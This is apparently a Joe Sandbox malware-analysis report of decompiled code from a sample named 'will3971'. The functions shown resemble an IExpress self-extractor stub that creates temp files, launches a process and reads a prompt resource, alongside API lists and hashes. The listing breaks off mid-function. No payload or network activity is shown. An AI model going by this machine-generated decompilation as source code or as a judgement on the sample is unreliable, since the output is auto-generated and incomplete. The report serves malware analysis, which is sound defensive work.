                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: OpenQuery$CloseInfoValue
                                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                • API String ID: 2209512893-559176071
                                                • Opcode ID: ca5b9d473026fba28289ec9dc34a8aa6fd620c51a3b0e4bfd9bf748549cbc73e
                                                • Instruction ID: 7e0e5fddecfa737bcad796223b079f90c2e633aa4fb124f9eb10c805ffacee79
                                                • Opcode Fuzzy Hash: ca5b9d473026fba28289ec9dc34a8aa6fd620c51a3b0e4bfd9bf748549cbc73e
                                                • Instruction Fuzzy Hash: AB11607592222DFB9F209B91AC0DDFBFE6CDF027E1F504075BA08E2040DA705A58D6A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 533 2f6a60-2f6a91 call 2f7155 call 2f7208 GetStartupInfoW 539 2f6a93-2f6aa2 533->539 540 2f6abc-2f6abe 539->540 541 2f6aa4-2f6aa6 539->541 544 2f6abf-2f6ac5 540->544 542 2f6aaf-2f6aba Sleep 541->542 543 2f6aa8-2f6aad 541->543 542->539 543->544 545 2f6ac7-2f6acf _amsg_exit 544->545 546 2f6ad1-2f6ad7 544->546 547 2f6b0b-2f6b11 545->547 548 2f6ad9-2f6ae9 call 2f6c3f 546->548 549 2f6b05 546->549 551 2f6b2e-2f6b30 547->551 552 2f6b13-2f6b24 _initterm 547->552 555 2f6aee-2f6af2 548->555 549->547 553 2f6b3b-2f6b42 551->553 554 2f6b32-2f6b39 551->554 552->551 556 2f6b67-2f6b71 553->556 557 2f6b44-2f6b51 call 2f7060 553->557 554->553 555->547 558 2f6af4-2f6b00 555->558 560 2f6b74-2f6b79 556->560 557->556 566 2f6b53-2f6b65 557->566 561 2f6c39-2f6c3e call 2f724d 558->561 563 2f6b7b-2f6b7d 560->563 564 2f6bc5-2f6bc8 560->564 569 2f6b7f-2f6b81 563->569 570 2f6b94-2f6b98 563->570 567 2f6bca-2f6bd3 564->567 568 2f6bd6-2f6be3 _ismbblead 564->568 566->556 567->568 574 2f6be9-2f6bed 568->574 575 2f6be5-2f6be6 568->575 569->564 576 2f6b83-2f6b85 569->576 572 2f6b9a-2f6b9e 570->572 573 2f6ba0-2f6ba2 570->573 577 2f6ba3-2f6bbc call 2f2bfb 572->577 573->577 574->560 579 2f6c1e-2f6c25 574->579 575->574 576->570 580 2f6b87-2f6b8a 576->580 577->579 586 2f6bbe-2f6bbf exit 577->586 582 2f6c27-2f6c2d _cexit 579->582 583 2f6c32 579->583 580->570 584 2f6b8c-2f6b92 580->584 582->583 583->561 584->576 586->564
                                                C-Code - Quality: 51%
                                                			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                				signed int* _t25;
                                                				signed int _t26;
                                                				signed int _t29;
                                                				int _t30;
                                                				signed int _t37;
                                                				signed char _t41;
                                                				signed int _t53;
                                                				signed int _t54;
                                                				intOrPtr _t56;
                                                				signed int _t58;
                                                				signed int _t59;
                                                				intOrPtr* _t60;
                                                				void* _t62;
                                                				void* _t67;
                                                				void* _t68;
                                                
                                                				E002F7155();
                                                				_push(0x58);
                                                				_push(0x2f72b8);
                                                				E002F7208(__ebx, __edi, __esi);
                                                				 *(_t62 - 0x20) = 0;
                                                				GetStartupInfoW(_t62 - 0x68);
                                                				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                				_t53 = 0;
                                                				while(1) {
                                                					asm("lock cmpxchg [edx], ecx");
                                                					if(0 == 0) {
                                                						break;
                                                					}
                                                					if(0 != _t56) {
                                                						Sleep(0x3e8);
                                                						continue;
                                                					} else {
                                                						_t58 = 1;
                                                						_t53 = 1;
                                                					}
                                                					L7:
                                                					_t67 =  *0x2f88b0 - _t58; // 0x2
                                                					if(_t67 != 0) {
                                                						__eflags =  *0x2f88b0; // 0x2
                                                						if(__eflags != 0) {
                                                							 *0x2f81e4 = _t58;
                                                							goto L13;
                                                						} else {
                                                							 *0x2f88b0 = _t58;
                                                							_t37 = E002F6C3F(0x2f10b8, 0x2f10c4); // executed
                                                							__eflags = _t37;
                                                							if(__eflags == 0) {
                                                								goto L13;
                                                							} else {
                                                								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                								_t30 = 0xff;
                                                							}
                                                						}
                                                					} else {
                                                						_push(0x1f);
                                                						L002F6FF4();
                                                						L13:
                                                						_t68 =  *0x2f88b0 - _t58; // 0x2
                                                						if(_t68 == 0) {
                                                							_push(0x2f10b4);
                                                							_push(0x2f10ac);
                                                							L002F7202();
                                                							 *0x2f88b0 = 2;
                                                						}
                                                						if(_t53 == 0) {
                                                							 *0x2f88ac = 0;
                                                						}
                                                						_t71 =  *0x2f88b4;
                                                						if( *0x2f88b4 != 0 && E002F7060(_t71, 0x2f88b4) != 0) {
                                                							_t60 =  *0x2f88b4; // 0x0
                                                							 *0x2fa288(0, 2, 0);
                                                							 *_t60();
                                                						}
                                                						_t25 = __imp___acmdln; // 0x76665b9c
                                                						_t59 =  *_t25;
                                                						 *(_t62 - 0x1c) = _t59;
                                                						_t54 =  *(_t62 - 0x20);
                                                						while(1) {
                                                							_t41 =  *_t59;
                                                							if(_t41 > 0x20) {
                                                								goto L32;
                                                							}
                                                							if(_t41 != 0) {
                                                								if(_t54 != 0) {
                                                									goto L32;
                                                								} else {
                                                									while(_t41 != 0 && _t41 <= 0x20) {
                                                										_t59 = _t59 + 1;
                                                										 *(_t62 - 0x1c) = _t59;
                                                										_t41 =  *_t59;
                                                									}
                                                								}
                                                							}
                                                							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                								_t29 = 0xa;
                                                							} else {
                                                								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                							}
                                                							_push(_t29);
                                                							_t30 = E002F2BFB(0x2f0000, 0, _t59); // executed
                                                							 *0x2f81e0 = _t30;
                                                							__eflags =  *0x2f81f8;
                                                							if( *0x2f81f8 == 0) {
                                                								exit(_t30); // executed
                                                								goto L32;
                                                							}
                                                							__eflags =  *0x2f81e4;
                                                							if( *0x2f81e4 == 0) {
                                                								__imp___cexit();
                                                								_t30 =  *0x2f81e0; // 0x0
                                                							}
                                                							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                							goto L40;
                                                							L32:
                                                							__eflags = _t41 - 0x22;
                                                							if(_t41 == 0x22) {
                                                								__eflags = _t54;
                                                								_t15 = _t54 == 0;
                                                								__eflags = _t15;
                                                								_t54 = 0 | _t15;
                                                								 *(_t62 - 0x20) = _t54;
                                                							}
                                                							_t26 = _t41 & 0x000000ff;
                                                							__imp___ismbblead(_t26);
                                                							__eflags = _t26;
                                                							if(_t26 != 0) {
                                                								_t59 = _t59 + 1;
                                                								__eflags = _t59;
                                                								 *(_t62 - 0x1c) = _t59;
                                                							}
                                                							_t59 = _t59 + 1;
                                                							 *(_t62 - 0x1c) = _t59;
                                                						}
                                                					}
                                                					L40:
                                                					return E002F724D(_t30);
                                                				}
                                                				_t58 = 1;
                                                				__eflags = 1;
                                                				goto L7;
                                                			}


















                                                0x002f6a60
                                                0x002f6a6a
                                                0x002f6a6c
                                                0x002f6a71
                                                0x002f6a78
                                                0x002f6a7f
                                                0x002f6a85
                                                0x002f6a8e
                                                0x002f6a91
                                                0x002f6a93
                                                0x002f6a9c
                                                0x002f6aa2
                                                0x00000000
                                                0x00000000
                                                0x002f6aa6
                                                0x002f6ab4
                                                0x00000000
                                                0x002f6aa8
                                                0x002f6aaa
                                                0x002f6aab
                                                0x002f6aab
                                                0x002f6abf
                                                0x002f6abf
                                                0x002f6ac5
                                                0x002f6ad1
                                                0x002f6ad7
                                                0x002f6b05
                                                0x00000000
                                                0x002f6ad9
                                                0x002f6ad9
                                                0x002f6ae9
                                                0x002f6af0
                                                0x002f6af2
                                                0x00000000
                                                0x002f6af4
                                                0x002f6af4
                                                0x002f6afb
                                                0x002f6afb
                                                0x002f6af2
                                                0x002f6ac7
                                                0x002f6ac7
                                                0x002f6ac9
                                                0x002f6b0b
                                                0x002f6b0b
                                                0x002f6b11
                                                0x002f6b13
                                                0x002f6b18
                                                0x002f6b1d
                                                0x002f6b24
                                                0x002f6b24
                                                0x002f6b30
                                                0x002f6b39
                                                0x002f6b39
                                                0x002f6b3b
                                                0x002f6b42
                                                0x002f6b57
                                                0x002f6b5f
                                                0x002f6b65
                                                0x002f6b65
                                                0x002f6b67
                                                0x002f6b6c
                                                0x002f6b6e
                                                0x002f6b71
                                                0x002f6b74
                                                0x002f6b74
                                                0x002f6b79
                                                0x00000000
                                                0x00000000
                                                0x002f6b7d
                                                0x002f6b81
                                                0x00000000
                                                0x00000000
                                                0x002f6b83
                                                0x002f6b8c
                                                0x002f6b8d
                                                0x002f6b90
                                                0x002f6b90
                                                0x002f6b83
                                                0x002f6b81
                                                0x002f6b94
                                                0x002f6b98
                                                0x002f6ba2
                                                0x002f6b9a
                                                0x002f6b9a
                                                0x002f6b9a
                                                0x002f6ba3
                                                0x002f6bab
                                                0x002f6bb0
                                                0x002f6bb5
                                                0x002f6bbc
                                                0x002f6bbf
                                                0x00000000
                                                0x002f6bbf
                                                0x002f6c1e
                                                0x002f6c25
                                                0x002f6c27
                                                0x002f6c2d
                                                0x002f6c2d
                                                0x002f6c32
                                                0x00000000
                                                0x002f6bc5
                                                0x002f6bc5
                                                0x002f6bc8
                                                0x002f6bcc
                                                0x002f6bce
                                                0x002f6bce
                                                0x002f6bd1
                                                0x002f6bd3
                                                0x002f6bd3
                                                0x002f6bd6
                                                0x002f6bda
                                                0x002f6be1
                                                0x002f6be3
                                                0x002f6be5
                                                0x002f6be5
                                                0x002f6be6
                                                0x002f6be6
                                                0x002f6be9
                                                0x002f6bea
                                                0x002f6bea
                                                0x002f6b74
                                                0x002f6c39
                                                0x002f6c3e
                                                0x002f6c3e
                                                0x002f6abe
                                                0x002f6abe
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 002F7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 002F7182
                                                  • Part of subcall function 002F7155: GetCurrentProcessId.KERNEL32 ref: 002F7191
                                                  • Part of subcall function 002F7155: GetCurrentThreadId.KERNEL32 ref: 002F719A
                                                  • Part of subcall function 002F7155: GetTickCount.KERNEL32 ref: 002F71A3
                                                  • Part of subcall function 002F7155: QueryPerformanceCounter.KERNEL32(?), ref: 002F71B8
                                                • GetStartupInfoW.KERNEL32(?,002F72B8,00000058), ref: 002F6A7F
                                                • Sleep.KERNEL32(000003E8), ref: 002F6AB4
                                                • _amsg_exit.MSVCRT ref: 002F6AC9
                                                • _initterm.MSVCRT ref: 002F6B1D
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 002F6B49
                                                • exit.KERNELBASE ref: 002F6BBF
                                                • _ismbblead.MSVCRT ref: 002F6BDA
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                • String ID:
                                                • API String ID: 836923961-0
                                                • Opcode ID: 8548611e9310da39807f8e491b86af57854771a1d0e2edeee45d8475e3b28f62
                                                • Instruction ID: 21a8702fc7a1390c7a5a9975514fc95310b4c360532f27e9c9a798b28a4989b4
                                                • Opcode Fuzzy Hash: 8548611e9310da39807f8e491b86af57854771a1d0e2edeee45d8475e3b28f62
                                                • Instruction Fuzzy Hash: 0341C27197422EDBDB219F68E81D77AF7A0EB457E4F54013AEA45E3290CF704861CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 587 2f58c8-2f58d5 588 2f58d8-2f58dd 587->588 588->588 589 2f58df-2f58f1 LocalAlloc 588->589 590 2f5919-2f5959 call 2f1680 call 2f658a CreateFileA LocalFree 589->590 591 2f58f3-2f5901 call 2f44b9 589->591 594 2f5906-2f5910 call 2f6285 590->594 601 2f595b-2f596c CloseHandle GetFileAttributesA 590->601 591->594 600 2f5912-2f5918 594->600 601->594 602 2f596e-2f5970 601->602 602->594 603 2f5972-2f597b 602->603 603->600
                                                C-Code - Quality: 95%
                                                			E002F58C8(intOrPtr* __ecx) {
                                                				void* _v8;
                                                				intOrPtr _t6;
                                                				void* _t10;
                                                				void* _t12;
                                                				void* _t14;
                                                				signed char _t16;
                                                				void* _t20;
                                                				void* _t23;
                                                				intOrPtr* _t27;
                                                				CHAR* _t33;
                                                
                                                				_push(__ecx);
                                                				_t33 = __ecx;
                                                				_t27 = __ecx;
                                                				_t23 = __ecx + 1;
                                                				do {
                                                					_t6 =  *_t27;
                                                					_t27 = _t27 + 1;
                                                				} while (_t6 != 0);
                                                				_t36 = _t27 - _t23 + 0x14;
                                                				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                				if(_t20 != 0) {
                                                					E002F1680(_t20, _t36, _t33);
                                                					E002F658A(_t20, _t36, "TMP4351$.TMP");
                                                					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                					_v8 = _t10;
                                                					LocalFree(_t20);
                                                					_t12 = _v8;
                                                					if(_t12 == 0xffffffff) {
                                                						goto L4;
                                                					} else {
                                                						CloseHandle(_t12);
                                                						_t16 = GetFileAttributesA(_t33); // executed
                                                						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                							goto L4;
                                                						} else {
                                                							 *0x2f9124 = 0;
                                                							_t14 = 1;
                                                						}
                                                					}
                                                				} else {
                                                					E002F44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                					L4:
                                                					 *0x2f9124 = E002F6285();
                                                					_t14 = 0;
                                                				}
                                                				return _t14;
                                                			}













                                                0x002f58cd
                                                0x002f58d1
                                                0x002f58d3
                                                0x002f58d5
                                                0x002f58d8
                                                0x002f58d8
                                                0x002f58da
                                                0x002f58db
                                                0x002f58e1
                                                0x002f58ed
                                                0x002f58f1
                                                0x002f591e
                                                0x002f592c
                                                0x002f5943
                                                0x002f594a
                                                0x002f594d
                                                0x002f5953
                                                0x002f5959
                                                0x00000000
                                                0x002f595b
                                                0x002f595c
                                                0x002f5963
                                                0x002f596c
                                                0x00000000
                                                0x002f5972
                                                0x002f5974
                                                0x002f597a
                                                0x002f597a
                                                0x002f596c
                                                0x002f58f3
                                                0x002f5901
                                                0x002f5906
                                                0x002f590b
                                                0x002f5910
                                                0x002f5910
                                                0x002f5918

                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,002F5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F58E7
                                                • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,002F5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F5943
                                                • LocalFree.KERNEL32(00000000,?,002F5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F594D
                                                • CloseHandle.KERNEL32(00000000,?,002F5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F595C
                                                • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,002F5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 002F5963
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$TMP4351$.TMP
                                                • API String ID: 747627703-441577946
                                                • Opcode ID: 69da87bdd4b9fd7da27f0b51b2e35f1798da474da966e63ac2d6ed75206d2dd4
                                                • Instruction ID: 3d92dba37a1fef1f53d8b804e9e6915ea15ea0845ab4415a7004ae17d2bd191f
                                                • Opcode Fuzzy Hash: 69da87bdd4b9fd7da27f0b51b2e35f1798da474da966e63ac2d6ed75206d2dd4
                                                • Instruction Fuzzy Hash: DB11067161022966D7245F796C0DFB7BA59DF467F0B100635B70AD2181CAB09825C6A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 631 2f3fef-2f4010 632 2f410a-2f411a call 2f6ce0 631->632 633 2f4016-2f403b CreateProcessA 631->633 634 2f40c4-2f4101 call 2f6285 GetLastError FormatMessageA call 2f44b9 633->634 635 2f4041-2f406e WaitForSingleObject GetExitCodeProcess 633->635 650 2f4106 634->650 638 2f4091 call 2f411b 635->638 639 2f4070-2f4077 635->639 645 2f4096-2f40b8 CloseHandle * 2 638->645 639->638 643 2f4079-2f407b 639->643 643->638 644 2f407d-2f4089 643->644 644->638 647 2f408b 644->647 648 2f40ba-2f40c0 645->648 649 2f4108 645->649 647->638 648->649 651 2f40c2 648->651 649->632 650->649 651->650
                                                C-Code - Quality: 84%
                                                			E002F3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                				signed int _v8;
                                                				char _v524;
                                                				long _v528;
                                                				struct _PROCESS_INFORMATION _v544;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t20;
                                                				void* _t22;
                                                				int _t25;
                                                				intOrPtr* _t39;
                                                				signed int _t44;
                                                				void* _t49;
                                                				signed int _t50;
                                                				intOrPtr _t53;
                                                
                                                				_t45 = __edx;
                                                				_t20 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t20 ^ _t50;
                                                				_t39 = __ecx;
                                                				_t49 = 1;
                                                				_t22 = 0;
                                                				if(__ecx == 0) {
                                                					L13:
                                                					return E002F6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                				}
                                                				asm("stosd");
                                                				asm("stosd");
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                				if(_t25 == 0) {
                                                					 *0x2f9124 = E002F6285();
                                                					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                					_t45 = 0x4c4;
                                                					E002F44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                					L11:
                                                					_t49 = 0;
                                                					L12:
                                                					_t22 = _t49;
                                                					goto L13;
                                                				}
                                                				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                				_t44 = _v528;
                                                				_t53 =  *0x2f8a28; // 0x0
                                                				if(_t53 == 0) {
                                                					_t34 =  *0x2f9a2c; // 0x0
                                                					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                						_t34 = _t44 & 0xff000000;
                                                						if((_t44 & 0xff000000) == 0xaa000000) {
                                                							 *0x2f9a2c = _t44;
                                                						}
                                                					}
                                                				}
                                                				E002F411B(_t34, _t44);
                                                				CloseHandle(_v544.hThread);
                                                				CloseHandle(_v544);
                                                				if(( *0x2f9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                					goto L12;
                                                				} else {
                                                					goto L11;
                                                				}
                                                			}


















                                                0x002f3fef
                                                0x002f3ffa
                                                0x002f4001
                                                0x002f4008
                                                0x002f400a
                                                0x002f400b
                                                0x002f4010
                                                0x002f410a
                                                0x002f411a
                                                0x002f411a
                                                0x002f401c
                                                0x002f401d
                                                0x002f401e
                                                0x002f401f
                                                0x002f4033
                                                0x002f403b
                                                0x002f40ca
                                                0x002f40e9
                                                0x002f40f8
                                                0x002f4101
                                                0x002f4106
                                                0x002f4106
                                                0x002f4108
                                                0x002f4108
                                                0x00000000
                                                0x002f4108
                                                0x002f4049
                                                0x002f405c
                                                0x002f4062
                                                0x002f4068
                                                0x002f406e
                                                0x002f4070
                                                0x002f4077
                                                0x002f407f
                                                0x002f4089
                                                0x002f408b
                                                0x002f408b
                                                0x002f4089
                                                0x002f4077
                                                0x002f4091
                                                0x002f409c
                                                0x002f40a8
                                                0x002f40b8
                                                0x00000000
                                                0x002f40c2
                                                0x00000000
                                                0x002f40c2

                                                APIs
                                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 002F4033
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002F4049
                                                • GetExitCodeProcess.KERNELBASE ref: 002F405C
                                                • CloseHandle.KERNEL32(?), ref: 002F409C
                                                • CloseHandle.KERNEL32(?), ref: 002F40A8
                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 002F40DC
                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 002F40E9
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                • String ID:
                                                • API String ID: 3183975587-0
                                                • Opcode ID: 1d854bb7168f8c75a7fd79190b6ef90bf87c7c6d7f543128031dad270a1e9db0
                                                • Instruction ID: 8cb499f3c35e44320eb9c6927b02badb2fad09a983d47c5fba7ce1507d89d439
                                                • Opcode Fuzzy Hash: 1d854bb7168f8c75a7fd79190b6ef90bf87c7c6d7f543128031dad270a1e9db0
                                                • Instruction Fuzzy Hash: F0318F7165021CABEB20AF65EC4DFBBB778EB947A0F2001B9F609E2161CA705D95CE11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 652 2f51e5-2f520b call 2f468f LocalAlloc 655 2f522d-2f523c call 2f468f 652->655 656 2f520d-2f5228 call 2f44b9 call 2f6285 652->656 662 2f523e-2f5260 call 2f44b9 LocalFree 655->662 663 2f5262-2f5270 lstrcmpA 655->663 668 2f52b0 656->668 662->668 666 2f527e-2f529c call 2f44b9 LocalFree 663->666 667 2f5272-2f5273 LocalFree 663->667 674 2f529e-2f52a4 666->674 675 2f52a6 666->675 670 2f5279-2f527c 667->670 672 2f52b2-2f52b5 668->672 670->672 674->670 675->668
                                                C-Code - Quality: 100%
                                                			E002F51E5(void* __eflags) {
                                                				int _t5;
                                                				void* _t6;
                                                				void* _t28;
                                                
                                                				_t1 = E002F468F("UPROMPT", 0, 0) + 1; // 0x1
                                                				_t28 = LocalAlloc(0x40, _t1);
                                                				if(_t28 != 0) {
                                                					if(E002F468F("UPROMPT", _t28, _t29) != 0) {
                                                						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                						if(_t5 != 0) {
                                                							_t6 = E002F44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                							LocalFree(_t28);
                                                							if(_t6 != 6) {
                                                								 *0x2f9124 = 0x800704c7;
                                                								L10:
                                                								return 0;
                                                							}
                                                							 *0x2f9124 = 0;
                                                							L6:
                                                							return 1;
                                                						}
                                                						LocalFree(_t28);
                                                						goto L6;
                                                					}
                                                					E002F44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                					LocalFree(_t28);
                                                					 *0x2f9124 = 0x80070714;
                                                					goto L10;
                                                				}
                                                				E002F44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                				 *0x2f9124 = E002F6285();
                                                				goto L10;
                                                			}






                                                0x002f51fb
                                                0x002f5207
                                                0x002f520b
                                                0x002f523c
                                                0x002f5268
                                                0x002f5270
                                                0x002f528b
                                                0x002f5293
                                                0x002f529c
                                                0x002f52a6
                                                0x002f52b0
                                                0x00000000
                                                0x002f52b0
                                                0x002f529e
                                                0x002f5279
                                                0x00000000
                                                0x002f527b
                                                0x002f5273
                                                0x00000000
                                                0x002f5273
                                                0x002f524a
                                                0x002f5250
                                                0x002f5256
                                                0x00000000
                                                0x002f5256
                                                0x002f5219
                                                0x002f5223
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46A0
                                                  • Part of subcall function 002F468F: SizeofResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46A9
                                                  • Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46C3
                                                  • Part of subcall function 002F468F: LoadResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46CC
                                                  • Part of subcall function 002F468F: LockResource.KERNEL32(00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46D3
                                                  • Part of subcall function 002F468F: memcpy_s.MSVCRT ref: 002F46E5
                                                  • Part of subcall function 002F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46EF
                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,002F2F4D,?,00000002,00000000), ref: 002F5201
                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 002F5250
                                                  • Part of subcall function 002F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
                                                  • Part of subcall function 002F44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554
                                                  • Part of subcall function 002F6285: GetLastError.KERNEL32(002F5BBC), ref: 002F6285
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                • String ID: <None>$UPROMPT
                                                • API String ID: 957408736-2980973527
                                                • Opcode ID: b0eda541a7bf6ea86b7f26b2d62bab4c8879e088e488d373862f2d8f5ed4d547
                                                • Instruction ID: db62dcf9b1c4aeecdc2144fc567fc204efb203174e491566d56be3bd344ddbe8
                                                • Opcode Fuzzy Hash: b0eda541a7bf6ea86b7f26b2d62bab4c8879e088e488d373862f2d8f5ed4d547
                                                • Instruction Fuzzy Hash: BE11E6B522061DBBE3146B716C4DF3BE19DDBC93E0B10413DBB0AD5190DEB98C208A24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E002F52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                				signed int _v8;
                                                				char _v268;
                                                				signed int _t9;
                                                				signed int _t11;
                                                				void* _t21;
                                                				void* _t29;
                                                				CHAR** _t31;
                                                				void* _t32;
                                                				signed int _t33;
                                                
